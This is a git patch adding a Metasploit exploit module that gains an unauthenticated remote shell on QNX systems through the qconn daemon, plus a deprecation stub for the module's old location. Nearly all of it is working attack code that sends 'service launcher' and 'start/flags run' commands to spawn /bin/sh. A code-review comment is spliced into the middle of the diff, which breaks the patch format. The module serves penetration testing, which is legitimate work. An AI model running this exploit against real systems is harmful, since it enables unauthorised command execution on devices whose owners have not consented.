From a14df8d86e906e10931036df6ce688b74b832c03 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Tue, 16 Oct 2018 16:21:28 +0000
Subject: [PATCH] Move exploit/unix/misc/qnx_qconn_exec to exploit/qnx/qconn_exec
---
modules/exploits/qnx/qconn_exec.rb | 163 +++++++++++++++++++
modules/exploits/unix/misc/qnx_qconn_exec.rb | 3 +
2 files changed, 166 insertions(+)
create mode 100644 modules/exploits/qnx/qconn_exec.rb

diff --git a/modules/exploits/qnx/qconn_exec.rb b/modules/exploits/qnx/qconn_exec.rb
new file mode 100644
index 0000000000..c424b6ce42
--- /dev/null
+++ b/modules/exploits/qnx/qconn_exec.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'QNX qconn Command Execution',
+ 'Description' => %q{
+ This module uses the qconn daemon on QNX systems to gain a shell.
+
+ The QNX qconn daemon does not require authentication and allows
+ remote users to execute arbitrary operating system commands.
+
+ This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
+ and 6.5.0 SP1 (x86).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'David Odell', # Discovery
+ 'Mor!p3r', # PoC
+ 'Brendan Coles' # Metasploit
+ ],
+ 'References' =>
+ [
+ ['EDB', '21520'],
+ ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],
+ ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],
+ ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => '',
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find'
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'PAYLOAD' => 'cmd/unix/interact'
+ },
+ 'Platform' => 'unix', # QNX Neutrino
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [['Automatic', {}]],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Sep 4 2012',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ Opt::RPORT(8000),
+ OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])
+ ])
+ end
+
+ def check
+ vprint_status 'Sending check...'
+
+ connect
+ res = sock.get_once(-1, 10)
+
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+
+ unless res.include? 'QCONN'
+ return CheckCode::Safe
+ end
+
+ sock.put "service launcher\n"
+ res = sock.get_once(-1, 10)
+
+ if res.nil? || !res.include?('OK')
+ return CheckCode::Safe
+ end
+
+ fingerprint = Rex::Text.rand_text_alphanumeric rand(5..10)
+ sock.put "start/flags run /bin/echo /bin/echo #{fingerprint}\n"
+
+ if res.nil? || !res.include?('OK')
+ return CheckCode::Safe
+ end
+
+ Rex.sleep 1
+
+ res = sock.get_once(-1, 10)
+
+ if res.nil? || !res.include?(fingerprint)
+ return CheckCode::Safe
+ end
+
+ disconnect
+
+ CheckCode::Vulnerable
+ end
+
+ def exploit
+ unless check == CheckCode::Vulnerable
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ connect
+ res = sock.get_once(-1, 10)
+
+ unless res
+ fail_with Failure::Unreachable, 'Connection failed'
+ end
+
+ unless res.include? 'QCONN'
+ fail_with Failure::UnexpectedReply, 'Unexpected reply'
+ end
+
+ sock.put "service launcher\n"
+ res = sock.get_once(-1, 10)
+
+ if res.nil? || !res.include?('OK')
+ fail_with Failure::UnexpectedReply, 'Unexpected reply'
+ end
+
+ print_status 'Sending payload...'
+ sock.put "start/flags run #{datastore['SHELL']} -\n"
+
+ Rex.sleep 1
+
+ unless negotiate_shell sock
+ fail_with Failure::UnexpectedReply, 'Unexpected reply'
+ end
+
+ print_good 'Payload sent successfully'
+
+ handler
+ end
+
+ def negotiate_shell(sock)
+ Timeout.timeout(15) do
+ while true
+ data = sock.get_once(-1, 10)
+
+ if !data || data.length.zero?
+ return nil
+ end
+
+ if data.include?('#') || data.include?('No controlling tty')
+ return true
+ end
+
+ Rex.sleep 0.5
+ end
+ end
+ rescue ::Timeout::Error
+ return nil
+ end
+end
diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb
index c424b6ce42..0dd4704a95 100644
--- a/modules/exploits/unix/misc/qnx_qconn_exec.rb
+++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb
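Review bot: In `check`, the `if res.nil? || !res.include?('OK')` guard that follows `sock.put "start/flags run /bin/echo /bin/echo #{fingerprint}\n"` re-tests the reply to `service launcher` rather than a fresh one, because no `get_once` sits between the put and the test; the guard can never fail at that point and does not verify that the launcher accepted the command. Presumably a `res = sock.get_once(-1, 10)` was intended before the test, though if the `OK` and the echoed fingerprint can arrive in a single read the later fingerprint test would need to look at the accumulated data, so otherwise the duplicated guard should simply be dropped. Separately, every `return CheckCode::Safe` / `CheckCode::Unknown` path in `check` leaves the connection opened by `connect` open, so wrapping the body after `connect` in `ensure disconnect` would close it on every path. In `negotiate_shell`, `loop do` is the idiomatic form of `while true`. Since this file is a copy of modules/exploits/unix/misc/qnx_qconn_exec.rb, the same points apply to the deprecated module until it is removed.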
@@ -7,6 +7,9 @@ class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
 include Msf::Exploit::Remote::Tcp
+ include Msf::Module::Deprecated
+
+ deprecated(Date.new(2018, 10, 17), 'exploit/qnx/qconn_exec')
 
 def initialize(info = {})
 super(update_info(info,